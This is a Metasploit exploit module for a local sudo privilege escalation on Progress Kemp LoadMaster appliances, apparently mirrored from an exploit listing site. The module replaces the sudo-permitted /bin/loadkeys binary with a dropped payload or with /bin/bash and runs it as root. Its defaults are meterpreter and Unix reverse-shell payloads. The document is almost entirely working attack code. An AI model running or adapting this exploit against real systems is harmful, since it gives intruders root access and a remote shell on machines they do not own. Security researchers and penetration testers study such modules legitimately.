Share
## https://sploitus.com/exploit?id=1337DAY-ID-39611
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Kemp LoadMaster Local sudo privilege escalation',
        'Description' => %q{
          This module abuses a feature of the sudo command on Progress Kemp
          LoadMaster.  Certain binary files are allowed to automatically elevate
          with the sudo command.  This is based off of the file name.  Some files
          have this permission are not write-protected from the default 'bal' user.
          As such, if the file is overwritten with an arbitrary file, it will still
          auto-elevate.  This module overwrites the /bin/loadkeys file with another
          executable.
        },
        'Author' => [
          'Dave Yesland with Rhino Security Labs',
          'bwatters-r7' # module,
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],
          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']
        ],
        'DisclosureDate' => '2024-03-19',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'SessionTypes' => ['shell', 'meterpreter'],
        'Platform' => ['unix', 'linux'],
        'Targets' => [
          [
            'Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'Command',
            {
              'Arch' => [ARCH_CMD],
              'Type' => :command,
              'Payload' =>
                {
                  'BadChars' => "\x27",
                  'Compat' =>
                    {
                      'PayloadType' => 'cmd',
                      'RequiredCmd' => 'generic gawk telnet ssh echo'
                    }
                },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse'
              }
            }
          ]
        ],
        'Privileged' => true
      )
    )
    register_options([
      OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']),
      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ])
    ])
  end

  def check
    score = 0
    score += 1 if read_file('/usr/wui/index.js').include?('KEMP')
    score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster')
    score += 1 if exists?('/usr/wui/eula.kemp.html')
    vprint_status("Found #{score} indicators this is a KEMP product")
    return CheckCode::Detected if score > 0

    return CheckCode::Safe
  end

  def verify_copy(src, dest, elevate)
    orig_file_hash = file_remote_digestmd5(src)
    vprint_status("Moving #{src} to #{dest}")
    if elevate
      output = cmd_exec("sudo /bin/cp '#{src}' '#{dest}'")
    else
      output = cmd_exec("/bin/cp '#{src}' '#{dest}'")
    end
    return true if file_remote_digestmd5(dest) == orig_file_hash

    print_bad("Copy failed - #{output}")
    false
  end

  def execute_dropper(target_binary, binary_rename, temp_payload_path)
    vprint_status("Writing payload to #{temp_payload_path}")
    write_file(temp_payload_path, generate_payload_exe)
    chmod(temp_payload_path)
    register_file_for_cleanup(temp_payload_path)
    return unless verify_copy(target_binary, binary_rename, false)
    return unless verify_copy(temp_payload_path, target_binary, true)

    vprint_status("Running #{target_binary}")
    cmd_exec("sudo '#{target_binary}'")
  end

  def execute_command(target_binary, binary_rename, cmd)
    vprint_status('Preparing payload command')
    # save copy of target_binary
    return unless verify_copy(target_binary, binary_rename, false)
    return unless verify_copy('/bin/bash', target_binary, true)

    vprint_status('Running payload command')
    vprint_status(cmd_exec("sudo #{target_binary} -c '#{cmd}'"))
  end

  def exploit
    writable_dir = datastore['WRITABLE_DIR']
    if writable_dir.blank? || (writable_dir[-1] != '/')
      writable_dir += '/'
    end
    fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir)
    target_binary = datastore['TARGET_BINARY']
    binary_rename = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"
    target_binary_hash = file_remote_digestmd5(target_binary)
    begin
      case target['Type']
      when :dropper
        temp_payload = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"
        execute_dropper(target_binary, binary_rename, temp_payload)
      when :command
        execute_command(target_binary, binary_rename, payload.encoded)
      end
    ensure
      unless target_binary_hash == file_remote_digestmd5(target_binary)
        cmd_exec("sudo rm '#{target_binary}'")
        verify_copy(binary_rename, target_binary, true)
        cmd_exec("sudo rm '#{binary_rename}'")
      end
    end
    if target_binary_hash == file_remote_digestmd5(target_binary)
      print_good("#{target_binary} returned to original contents")
    else
      print_bad("#{target_binary} was not returned to original contents")
    end
  end
end